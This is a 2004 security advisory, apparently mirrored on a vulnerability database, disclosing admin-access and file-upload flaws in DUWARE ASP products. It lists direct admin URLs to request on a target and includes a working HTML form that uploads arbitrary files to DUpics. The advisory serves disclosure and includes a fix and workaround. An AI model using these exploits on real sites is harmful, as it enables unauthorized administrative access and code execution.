Lucene search

K

SCSA026.txt

πŸ—“οΈΒ 21 Jan 2004Β 00:00:00Reported byΒ frog-manTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 33Β Views

DUWARE Products have vulnerabilities allowing admin access and arbitrary file uploads in specific versions.

Show more
Code
`======================================================================  
Security Corporation Security Advisory [SCSA-026]  
  
DUWARE Products Admin Access and Arbitrary File Upload Vulnerability  
======================================================================  
  
PROGRAM: DUWARE Products  
HOMEPAGE: http://www.duware.com  
VULNERABLE VERSIONS:  
-------------------------------  
Product : DUcalendar  
Versions : 1.0, 1.1  
-------------------------------  
Product : DUclassified  
Versions : 4.0, 4.1  
-------------------------------  
Product : DUdirectory  
Version : 3.0  
-------------------------------  
Product : DUdownload  
Version : 1.0  
-------------------------------  
Product : DUgallery  
Versions : 3.0, 3.1, 3.2, 3.3  
-------------------------------  
Product : DUpics  
Version : 3.0  
-------------------------------  
Product : DUportal  
Version : 3.0  
-------------------------------  
Product : DUarticle  
Version : 1.0  
-------------------------------  
Product : DUclassmate  
Version : 1.0  
-------------------------------  
Product : DUpoll  
Version : 3.0  
-------------------------------  
Product : DUnews  
Version : 1.0  
-------------------------------  
Product : DUamazon  
Version : 3.0  
-------------------------------  
Product : DUpaypal  
Version : 3.0  
-------------------------------  
Product : DUfaq  
Version : 1.0  
-------------------------------  
Product : DUforum  
Version : 3.0  
-------------------------------  
RISK: MEDIUM/HIGH  
IMPACT: Admin Access  
Arbitrary File Upload  
  
RELEASE DATE: 2004-01-20  
  
  
======================================================================  
TABLE OF CONTENTS  
======================================================================  
  
1..........................................................DESCRIPTION  
2..............................................................DETAILS  
3.............................................................EXPLOITS  
4............................................................SOLUTIONS  
5...........................................................WORKAROUND  
6..................................................DISCLOSURE TIMELINE  
7..............................................................CREDITS  
8...........................................................DISCLAIMER  
9...........................................................REFERENCES  
10............................................................FEEDBACK  
  
  
1. DESCRIPTION  
======================================================================  
  
-------------------------------  
Product : DUcalendar  
Versions : 1.0, 1.1  
-------------------------------  
  
DUcalendar is a free Event Calendar application. Backend by Access   
database, DUcalendar can store thousands of events in category.   
Each event is displayed with full detail and description, also with  
its related events. You can customize DUcalendar to list only the  
events that you want to offer your visitors such as about Internet,  
TV, games, or convert. DUcalendar is an excellent add-on for your  
Web site. Start building communities and attracting more visitors  
to your site by using this free application.  
  
-------------------------------  
Product : DUclassified  
Versions : 4.0, 4.1  
-------------------------------  
  
DUclassified is a free Classified Ad Management application. Backend  
by Access database, DUclassified can store thousands of classified   
ads in category. Each classified ad is displayed with picture, full  
detail and description. Visitors can contact the ad's owner via a   
form. Ad' owners can manage their ads via a user-friendly panel.   
DUclassified is an excellent add-on for your Web site. Start   
building communities and attracting more visitors to your site by  
using this free application.  
  
-------------------------------  
Product : DUdirectory  
Version : 3.0  
-------------------------------  
  
DUdirectory is a free Links Listing Web application. Backend by   
Access database, DUdirectory can store thousands of links in   
category. Each link is displayed with full detail and description,  
also with its related links. You can customize DUdirectory to list  
only the links that you want to offer your visitors such as about  
Internet, books, games, or music. DUdirectory is an excellent add-on  
for your Web site. Start building communities and attracting more   
visitors to your site by using this free application.  
  
-------------------------------  
Product : DUdownload  
Version : 1.0  
-------------------------------  
  
DUdownload is a free Files Listing application. Backend by Access  
database, DUdownload can store thousands of file urls in category.  
Each file is displayed with full detail and description, also with  
its related files. You can customize DUdownload to list only the   
file urls that you want to offer your visitors such as about Internet,  
books, games, or music. DUdownload is an excellent add-on for your  
Web site. Start building communities and attracting more visitors to  
your site by using this free application  
  
-------------------------------  
Product : DUgallery  
Versions : 3.0, 3.1, 3.2, 3.3  
-------------------------------  
  
DUclassified is a free Classified Ad Management application. Backend   
by Access database, DUclassified can store thousands of classified ads  
in category. Each classified ad is displayed with picture, full detail  
and description. Visitors can contact the ad's owner via a form. Ad'   
owners can manage their ads via a user-friendly panel. DUclassified is  
an excellent add-on for your Web site. Start building communities and  
attracting more visitors to your site by using this free application.  
  
-------------------------------  
Product : DUpics  
Version : 3.0  
-------------------------------  
  
DUpics is a free Picture Voting application. Backend by Access database,  
DUpics can store thousands of pictures. Visitors can submit their own   
pictures for others to vote. After each vote, the picture will be shown  
on the side together with its average voting value. There is also a   
gallery of all pictures with their stats. DUpics is an excellent add-on  
for your Web site. Start building communities and attracting more   
visitors to your site by using this free application.  
  
-------------------------------  
Product : DUportal  
Version : 3.0  
-------------------------------  
  
DUportal is a free Web portal and online community. Backed end by Access  
database, DUportal contains numerous advanced features such as Web-based  
administration, Articles, Banner Ads, Event Calendar, Classified Ads, Web  
link directory, Downloads, Message Board, Picture Gallery, News,   
E-Commerce, Polls and Business Directory, and more which can be downloaded  
online. All modules are customizable via Web-based Admin panel, together  
with size, skins and themes. DUportal is an excellent solution for your   
Web portal and online community needs. Start building a community online  
by using this free Web application.  
  
  
-------------------------------  
Product : DUarticle  
Version : 1.0  
-------------------------------  
  
DUarticle is a free Articles Listing Web application. Backend by Access   
database, DUarticle can store thousands of articles in category. Each   
article is displayed with full detail and description, also with its   
related articles. You can customize DUarticle to list only the articles  
that you want to offer your visitors such as about Internet, books,   
games, or music. DUarticle is an excellent add-on for your Web site.   
Start building communities and attracting more visitors to your site by  
using this free application.  
  
-------------------------------  
Product : DUclassmate  
Version : 1.0  
-------------------------------  
  
DUclassmate is a free Classmates Listing & Friends Search Web application.  
Backend by Access database, DUclassmate can store unlimited number of   
alumni organized within states, cities and schools. Each entry is displayed  
with with old and new names, address, bio. and more.   
DUclassmate is an excellent add-on for your Web site. Start building   
communities and attracting more visitors to your site by using this  
free application.   
  
-------------------------------  
Product : DUpoll  
Version : 3.0  
-------------------------------  
  
DUpoll is a free Poll Manager application. Backend by Access database,   
DUpoll provides you unlimited numbers polls and choices. You can place   
the active poll anywhere on your Web page. DUpoll uses Cookies to prevent  
users from voting on one poll more than once. Poll result is presented   
with bar graph and numbers of votes for each choice, together with the   
percentage. Start building communities and attracting more visitors to  
your site by using this free application.  
  
-------------------------------  
Product : DUnews  
Version : 1.0  
-------------------------------  
  
DUnews is a free News Listing Web application. Backend by Access database,  
DUnews can store thousands of news articles in category. Each news article  
is displayed with full detail and description, also with its related articles.  
You can customize DUnews to list only the articles that you want to offer   
your visitors such as about Internet, books, games, or music. DUnews is an   
excellent add-on for your Web site. Start building communities and attracting  
more visitors to your site by using this free application.  
  
-------------------------------  
Product : DUamazon  
Version : 3.0  
-------------------------------  
  
DUamazon is a free Web storefront for affiliates of Amazon. Backend by Access  
database, DUamazon can store thousands of Amazon's products in category with  
product images. Each product is displayed with full detail and description,   
also with its related products. You can customize DUamazon to list only the   
products that you want to offer your visitors such as books, games, or music.  
DUamazon is an excellent add-on for your Web site. Start earning up to 15%   
commission and attracting more visitors to your site by using this   
free application.  
  
-------------------------------  
Product : DUpaypal  
Version : 3.0  
-------------------------------  
  
DUpaypal is a free Paypal-based E-Commerce storefront. Backend by Access  
database, DUpaypal can store thousands of products in category with images.  
Each product is displayed with full detail and description, also with its   
related products. You can customize DUpaypal to sell only the products that  
you want to offer your customers such as books, games, or CDs or clothes.   
DUpaypal is an excellent add-on for your Web site. Start selling your products  
and attracting more customers to your site by using this free application.   
  
-------------------------------  
Product : DUfaq  
Version : 1.0  
-------------------------------  
  
DUfaq is a free Knowledge Base Web application. Backend by Access database,   
DUfaq can store unlimited number of questions and answers organized in category.  
Each question is displayed with full detail and answer, also with its related   
questions. You can customize DUfaq to list only the questions that you want to  
offer your visitors such as about Customer Support, Shipping and Handling, etc.   
DUfaq is an excellent add-on for your Web site. Start building communities and   
attracting more visitors to your site by using this free application.   
  
-------------------------------  
Product : DUforum  
Version : 3.0  
-------------------------------  
  
DUforum is a free Message Board application. Backend by Access database,   
DUforum can store unlimited numbers of messages and forums.   
DUforum is an excellent add-on for your Web site. Attract more visitors to  
your site by using this free application.   
  
(direct quote from DUWARE website)  
  
  
2. DETAILS  
======================================================================  
  
- Admin Access :  
  
A vulnerability has been discovered in DUWARE Products, which allows  
malicious users to become administrators  
  
This vulnerability affect all products of DUware.   
For example we use the DUcalendar product and its /admin/edit.asp file.   
  
Here the vulnerable code :  
  
----------------------------------------------------  
<% Response.Buffer = True %>  
<html>  
<head>  
<title>DUcalendar 1.0</title>  
<link href="../assets/DUcalendar.css" rel="stylesheet" type="text/css">  
</head>  
<body background="../assets/bg_main.gif" >  
<table width="760" border="0" cellspacing="2" cellpadding="0">  
<tr>  
<td>  
<!--#include file="inc_header.asp" -->  
</td>  
</tr>  
  
<tr>  
<td>  
<table width="100%" border="0" cellpadding="0" cellspacing="1"   
bgcolor="#003399">  
<tr>  
<td bgcolor="#FFFFFF">  
  
  
<!--#include file="inc_menu.asp" -->  
<!--#include file="inc_edit.asp" -->  
  
  
</td>  
</tr>  
</table></td>  
</tr>  
<tr>  
<td>  
<!--#include file="inc_footer.asp" -->  
</td>  
</tr>  
</table>  
</body>  
</html>  
----------------------------------------------------  
  
We can see that files inc_menu.asp and inc_edit.asp are included.  
  
The file inc_menu.asp contains the security code preventing   
the access to the edit.asp file :  
  
Here the vulnerable code :  
  
----------------------------------------------------  
[...]  
<%  
' *** Restrict Access To Page: Grant or deny access to this page  
MM_authorizedUsers=""  
MM_authFailedURL="default.asp"  
MM_grantAccess=false  
If Session("MM_Username") <> "" Then  
If (true Or CStr(Session("MM_UserAuthorization"))="") Or _  
(InStr(1,MM_authorizedUsers,Session("MM_UserAuthorization"))>=1)   
Then  
MM_grantAccess = true  
End If  
End If  
If Not MM_grantAccess Then  
MM_qsChar = "?"  
If (InStr(1,MM_authFailedURL,"?") >= 1) Then MM_qsChar = "&"  
MM_referrer = Request.ServerVariables("URL")  
if (Len(Request.QueryString()) > 0) Then MM_referrer = MM_referrer & "?" &   
Request.QueryString()  
MM_authFailedURL = MM_authFailedURL & MM_qsChar & "accessdenied=" &   
Server.URLEncode(MM_referrer)  
Response.Redirect(MM_authFailedURL)  
End If  
%>  
[...]  
----------------------------------------------------  
  
This code of security is present in all the applications of DUware.  
  
The problem is essentially due to 3 elements:  
- All the administrator's code is in the file  
- A file is includes allowing the connection to the data base:  
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->  
- No check of the administrator's rights is made in this file.  
(Given that it was already made in the edit.asp file)  
  
  
- Arbitrary File Upload :  
  
A vulnerability has been identified in DUpics allowing malicious users to  
upload and execute arbitrary code by bypassing javascript filter.  
  
  
3. EXPLOITS  
======================================================================  
  
- Admin Access :  
  
- http://[target]/admin/inc_edit.asp?iEve=1  
- http://[target]/admin/inc_events.asp  
- http://[target]/admin/inc_type.asp  
  
  
>> DUclassified :  
- http://[target]/admin/inc_cats.asp  
- http://[target]/admin/inc_users.asp  
- http://[target]/admin/inc_user_edit.asp?id=admin  
  
>> DUdirectory :  
- http://[target]/admin/inc_links.asp  
- http://[target]/admin/inc_edit.asp?iLink=10  
- http://[target]/admin/inc_type.asp  
  
>> DUdownload :  
- http://[target]/admin/inc_files.asp  
- http://[target]/admin/inc_edit.asp?iFile=50  
- http://[target]/admin/inc_type.asp  
  
>> DUgallery :  
- http://[target]/admin/inc_pictures.asp  
- http://[target]/admin/inc_edit.asp?iPic=100  
- http://[target]/admin/inc_type.asp  
  
>> DUpics :  
- http://[target]/admin/inc_add.asp  
- http://[target]/admin/inc_pics.asp  
- http://[target]/admin/inc_edit.asp?iPic=500  
- http://[target]/admin/inc_type.asp  
  
>> DUportal :  
- http://[target]/admin/inc_channel_listing.asp  
- http://[target]/admin/inc_channel_edit.asp?iChannel=5  
- http://[target]/admin/inc_config.asp  
- http://[target]/admin/inc_users.asp  
- http://[target]/admin/inc_users_edit.asp?iUser=admin  
  
etc...   
  
- Arbitrary File Upload :  
  
>> DUpics :  
  
------------------Dupicsexploit.html------------------  
<html>  
<head><title>DUpics 3.0 Arbitrary File Upload Exploit</title></head>  
<body>  
<form action="/admin/inc_add.asp?GP_upload=true" method="post"   
enctype="multipart/form-data"   
onsubmit="this.action=this.url.value+this.action;alert('Your file will be   
uploaded to '+this.url.value+'/pictures/');">  
Target URL : <input type="text" name="url"   
value="http://[target]/DUpics/"><br>  
FILE : <input name="PIC_IMAGE" type="file"><br>  
<input type="hidden" name="PIC_NAME" value="admin">  
<input type="hidden" name="PIC_WIDTH">  
<input type="hidden" name="PIC_HEIGHT">  
<input type="hidden" name="PIC_APPROVED" value="1">  
<input type="hidden" name="MM_insert" value="true">  
<input type="submit" value="Upload" name="submit">  
</form>  
<p align="right">For more informations about this exploit :   
<a href="http://www.security-corporation.com/advisories-026.html"   
target="_blank"> Security-Corporation.com</a></p>  
</body>  
</html>  
------------------Dupicsexploit.html------------------  
  
  
4. SOLUTIONS  
======================================================================  
  
The DUWare Services was notified and have released a fix for all products.  
  
  
5. WORKAROUND  
======================================================================  
  
It is necessary to change one of three points quoted previously.  
- Do not put all the code of aministration in these files  
OR  
- Remove the inclusion in all inc_ files and add it in main file.  
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->  
OR  
- Check the admin session in all inc_ files.  
  
  
6. DISCLOSURE TIMELINE  
======================================================================  
  
10/01/2004 Vulnerability discovered  
12/01/2004 Vendor notified  
14/01/2004 Vendor response  
14/01/2004 Security Corporation clients notified  
14/01/2004 Started e-mail discussions  
17/01/2004 Last e-mail received  
20/01/2004 Public disclosure  
  
7. CREDITS  
======================================================================  
  
frog-m@n <[email protected]> from  
http://www.phpsecure.info is credited with this discovery  
  
  
8. DISLAIMER  
======================================================================  
  
The information within this paper may change without notice. Use of  
this information constitutes acceptance for use in an AS IS condition.  
There are NO warranties with regard to this information. In no event  
shall the author be liable for any damages whatsoever arising out of  
or in connection with the use or spread of this information. Any use  
of this information is at the user's own risk.  
  
  
9. REFERENCES  
======================================================================  
  
- Original Version:  
http://www.security-corporation.com/advisories-026.html  
  
- Version Française:  
http://www.security-corporation.com/index.php?id=advisories&a=026-FR  
  
  
10. FEEDBACK  
======================================================================  
  
Please send suggestions, updates, and comments to:  
  
Security Corporation  
http://www.security-corporation.com  
[email protected]  
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4
33
.json
Report